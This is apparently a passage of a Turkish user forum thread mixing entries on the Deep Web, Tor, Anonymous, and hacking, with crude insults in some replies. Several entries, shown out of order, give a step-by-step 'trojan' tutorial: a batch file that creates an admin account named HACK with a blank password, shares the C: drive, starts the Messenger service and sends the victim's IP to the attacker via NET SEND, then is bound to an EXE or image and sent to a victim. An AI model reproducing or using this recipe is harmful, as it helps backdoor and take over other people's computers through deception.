1. 26.
    +3
    Scientology Kilisesi'nin çağrı hatlarını kitlediler ve sürekli olarak siyah fax göndererek yazıcı tonerinin bitmesine neden oldular. Daha sonrasında sitelerine erişimi kestiler. Site çökük bir vaziyetteyken Anonymous ilişkili birçok isim YouTube'da robot sesi kullanarak bir mesaj yayınladı. Mesajda "takipçilerinizin ve internetin iyiliği için, sizi internetten sileceğiz" deniyordu. Scientology Kilisesi'nin önemli isimlerinden Tom Cruise da Anonymous'tan nasibini alan isimler arasındadır.
    ···
  2. 27.
    +3
    Deep Web sitelerine Nasıl ulaşılır?

    Önceki bölümde uzun uzadıya açıklandığı gibi Deep Web, sahip olduğu bu derinlik iddialarını aslında bilinmezliğinden alıyor. Ne kadar derin veya ne tarz sitelere veya kişilere ulaşılma verilerinin analizleri de, yine erişim zorlukları nedeniyle net olarak gerçekleştirilemiyor.
    ···
    1. 1.
      0
      Kardesim peki bilgisayarda keylogger oldugunu nasil anlariz internette bir sey buldum cmd ye netstat -an | find ":25" yazinca bir sey cikmamasi gerekiyormuş fakat bende 3 tane UDP bir seyler yaziyor sence ne yapmaliyim acil yanitlarsan iyi olur
      ···
  3. 28.
    +3
    Beyler ben pentration test ile ilginen birisi olarak şunu söyliyim keylogger ve trojen bir bruteforce yöntemidir ve bunlar en basitidir ve düşmanın yemesi gerekir ki windows bile kolayca bunları algılayıp hemen önlemektedir açmak istersenizde zaten sizden şifre ister(kendi pcnizin eminmisiniz diye yani karşı taraf iyice ikna olur virüs olduğuna) bunlarla uğraşmayın boşa kürek çekersiniz ki bu arkadaş hacker değil lammerdır lammerla kendini hacker gibi gösteren siyah şapkalı insanlardır hangi işletim sistemi olduğunu söylemiycem bilen bilir(a işletim sistemi diyelim) CRRACKING ve pentration test için çok uygun bir ortamdır ve burada keylogger ve trojen dışında bilgisiyarın sisteminde birçok crackleme aleti bulunur lütfen böyle insanlara inanıp bilgisayarıza zarar vermeyin eğer hacklemek istiyosanız araştırın ve siber güvenlik ve yazılımı öğrenip sonra gerekli işletim sistemini bulup saldırınızı gerçekleştiriniz(inkilapta bile bilgisayar bölümü var oradan ihtiyacınız olan kitapları alınız bende hacking için 3 kitap var adını isteyenlere verebilirim bu kitaptakiler en basic olanlarıdır) tekrar ediyorum böyle lammerla yol vermeyin öğrencekseniz zarrarları ve cezalarıyla öğrenin yoksa hem bilgisayınıza zarar verir hemde çok karanlık biir yerde fenersiz dolaşır gibi ne yaptığınızı bilmeden kendinizi çok kötü yollara atabilirsiniz.
    ···
    1. 1.
      0
      ee aga kitaplarda ne yazıyo peki mesela örneklenir az
      ···
    2. 2.
      0
      senin bu gördüğün trojen vb.şeyler varya onlar olmadan nasıl sisteme sızılcağı onlara karşı güvenlik önlemi spoofing(ağ dinleme) şifre kırma mantıkları cookie poisining ve daha fazla çok şey var okuyan yok zaten sistemin adı kali linux kitapların adı
      Kali linux
      Hacking interface
      3.sünün adını unutum eve dönünce bulur yazarım
      ···
  4. 29.
    +3
    Deep Web'in başlıca örneği: Wikileaks!

    Bilindiği gibi devletlere ait gizli belgeleri sızdıran Wikileaks, ilk etapta biraz önce tanımladığımız Brightnet kapsamında yer alıyordu. Yani Darknet’in içerikleri gibi insanlık dışı değil ancak doğrudan Deep Web içeriği olarak tanımlanamayacak kadarda özel içerikler sunuyordu.

    Daha sonraları Wikileaks, Deep Web içerisinde gizliliğini yitirmeye başladı ve herkese açık olarak indekslenebilir yani bulunabilir hale getirildi.

    Deep Web’in bu şekilde sahip olduğu çok seviyeli/katmanlı yapısı, daha önce belirttiğimiz veri büyüklüğü bilinmezliğinin de başlıca sebeplerinden oluyor...
    ···
  5. 30.
    +3
    heyçkır mısın sen
    ···
    1. 1.
      0
      Değilim olmaya çalışıyoz gülüm
      ···
    2. 2.
      -1
      huur cocu sen oybirinciydin ne ara önüncü oldun aq
      ···
      1. 1.
        0
        senin gibi aptal huur çocuklarını kandırıyodum hahaha
        ···
    3. 3.
      0
      Heyçkır benim o bebe
      ···
    4. diğerleri 1
  6. 31.
    +2
    Artik IP sini de bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylasima actirdiginiz C: sürücüsüne sizar istediginizi yaparsiniz.

    Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir.
    ···
  7. 32.
    +2
    4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve calismayan Messenger servisini calistiracagiz.

    Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz.

    net start Messenger

    Size tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardigib sirada önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi olur.

    Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

    Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak ve sifresi de blank yani bos olacaktir. C: sürücüsü de full olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir.
    ···
  8. 33.
    +2
    Anonoymous saldırıları

    Ana akım medyada ilk çıkışlarını, bir otel sitesine aynı profil fotoğrafı ve kimlikle kayıt olmaları ve siteyi kullanılmaz hale getirmeleriyle yaptılar. Bu saldırıları sonucunda "steroid basmış hackerlar", "evcil teröristler" gibi isimler kazandılar. Daha sonrasında bu tip saldırıları internet genelinde yapmaya devam ettiler.

    2004 yılından beri yaptıkları site çökertme işine günümüzde de devam ediyorlar.
    ···
  9. 34.
    +2
    4-) NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;

    net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan

    Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin.
    ···
  10. 35.
    +2
    Size simdi anlatacagim yöntem, biraz mantik biraz da teknik bilgi gerektirmektedir. Bu ikisinin disinda baska hicbir toola ihtiyaciniz yoktur.

    Simdi Trojanimizi hazirlamaya baslayalim;

    1-) Öncelikle bir TXT dosyasi acin ve icine su komutu girin;

    net user HACK /add

    Bu komut sayesinde kurbanin makinasinda "HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya geciyoruz;
    ···
  11. 36.
    +3 -1
    Trojen atmayla hacker oldu amk evladı
    ···
  12. 37.
    +2
    Trojan Nasil Yapilir?
    Evet arkadaslar, konunun basligindan da anlayabileceginiz gibi Anti Virus programlari tarafindan taninmayan tamamen size ait bir trojan yapmayi size kisaca anlatacagim;

    Trojanin ana amaci, adindan da anlasilacagi gibi hedef sisteme sizarak ya ele gecirmek ya da bilgi toplamaktir. Dikkat edin zarar vermek demiyorum cünkü bu etik olarak yanlis bir harekettir
    ···
  13. 38.
    +3 -1
    Öte yandan yine yanlış anlaşılmaların kurbanı olarak Deep Web ismi, doğrudan bu Darknet içerikleri ile bağdaştırılıyor. Ama bu algıda ne yazık ki yanlış… Zira Deep Web, tanımından da anlaşılacağı üzere, aslında sadece indekslenemeyen yani arama motorlarına görünmeyen siteleri veya verileri tanımlıyor. Ancak herhangi bir kuruma ait özel çevrimiçi belgeler dahi, aslında Deep Web içeriği olarak değerlendirebilir. Bu bağlamda, iki tabir arasındaki ayrımı doğru yapmak gerekiyor.

    Son olarak birde Darknet’in aydınlık kısmı olarak anılan Brightnet tabirine açıklık getirelim. Brightnet olarak tabir gören siteler veya içerikler, Darknet içerikleri olmadığı gibi doğrudan Deep Web içerisinde de yer almıyor. Yani Darkweb gibi insanlık dışı veya ağır suç gerektiren içerikleri barındırmıyor. Buna nazaran yayınları, aslında çokta "neşeli" değil. Örnek vermek gerekirse hepimizin bildiği ve şu an herkesin erişebildiği Wikileaks isimli web sitesi, aslında Deep Web’de doğmuş bir sitedir.
    ···
  14. 39.
    +2
    DarkNet Siteleri ne kadar gerçek?

    Çoğunlukla savsata olarak değerlendirilen bu suç gerektiren kategorilerde yer alan Darknet siteleri, kurucuları tarafından büyük bir hassasiyetle gizli tutulmaya çalışılıyor. Daha önce de belirtildiği gibi, herhangi bir arama motoru ile Deep Web sitelerine ulaşmak mümkün değildir.

    Aslı olan Darknet siteleri de genel olarak IP tabanlı erişime imkan sunarlar ve bu adreslerin bilgileri sadece el altından, ciddi alıcı olduğuna inanılan kişilere ulaştırılır. Yani gerçek anlamda, silah satışı, kiralık katil ilanı veya sahte pasaport temini sağlayan sitelere ulaşmak, ciddi anlamda güçtür.
    ···
  15. 40.
    +2
    Usta sözlük yararlı bilgilerle dolmaya başladı bu ne amk
    ···
    1. 1.
      0
      Bide sizin gii güzel insanlardan destek gelince 10 numara 5 yıldız oluyo
      ···
  16. 41.
    +1
    Aslında Tor Ağı, temel olarak bir VPN servisi ile benzerlik gösteriyor. Tor Browser ile erişilen Tor Ağı, kullanıcıyı Dünya üzerindeki birçok noktadaki farklı bilgisayarlar üzerinden geçiren bir bağlantı sağlıyor. Yani VPN servisinde olduğu gibi Dünya’nın belli bir noktasındaki sunucudan değil de, birçok farklı bölgedeki birçok farklı bilgisayarlar üzerinden erişim sağlıyor.
    ···
  17. 42.
    +1
    Tor Ağı ile Deep Web ilişkisine geri dönecek olursak, görülebileceği üzere Deep Web veya farklı bağlantıları suç gerektiren eylemler ile kullanmak, büyük sonuçlar ortaya çıkartabiliyor. Tor Browser kullanarak, Tor Ağı üzerinden Deep Web veya Darknet sitelerine ulaşmanın mümkün olduğunu belirtmiştik. Ancak sadece Tor Browser ile ilk bölümde bahsi geçen sitelere ulaşmak mümkün değildir. Öyle ki, özellikle Darknet kapsamında bulunan siteler, bildiğimiz internet siteleri gibi “.com” veya “.net” gibi uzantılara sahip değiller...
    ···
  18. 43.
    +1
    Anonymous ilk olarak nerede çıktı?

    Anonymous ilk olarak bir imageboard olan 4chan'da meydana çıktı. Zaten 4chan kullanıcılarına sunduğu anonim olma seçeneğiyle bilinen bir mecradır. içinde barındırdığı elliden fazla kategori altında insanlar, anonim (size ulaşabilecekleri herhangi bir isim, link ya da adres olmadan) olarak paylaşım yaparlar. 4chan, düşünce özgürlüğünü desteklese de son zamanlarda bu politikasından vazgeçmiş ve birçok kullanıcısını kaybetmiştir. Anonymous topluluğunun halen bu gurubun içinde olup olmadığı ise bilinmiyor.
    ···
  19. 44.
    +1
    rez alayim
    ···
    1. 1.
      +1
      Destek için sağol var ol
      ···
    2. 2.
      0
      Helal et. Rez
      ···
    3. 3.
      0
      okunur yararlı
      ···
    4. diğerleri 1
  20. 45.
    +1
    Deep Web sitelerinin farkları nelerdir?

    Genel olarak “.onion” uzantısına sahip olan Deep Web sitelerine ulaşmak mümkündür. Zira bu uzantıya sahip Deep Web siteleri, medyada çokça adı geçen sitelerden oluyor. “.onion” uzantısı ise kabaca Tor Ağı aracılığında olan siteler anldıbına gelmektedir. Medya da popüler olarak kullanılan ve birçok farklı sansasyon getirecek konularla sunulan asılsız siteler, genelde “.onion” uzuntısına sahiptir. Ancak bu siteler, özellikle FBI gibi güvenlik kurumlarının “Oltalama” olarak tabir edilen aldatmaca sitemleri sonucu, yakalanmalar ile sonuçlanıyor.
    ···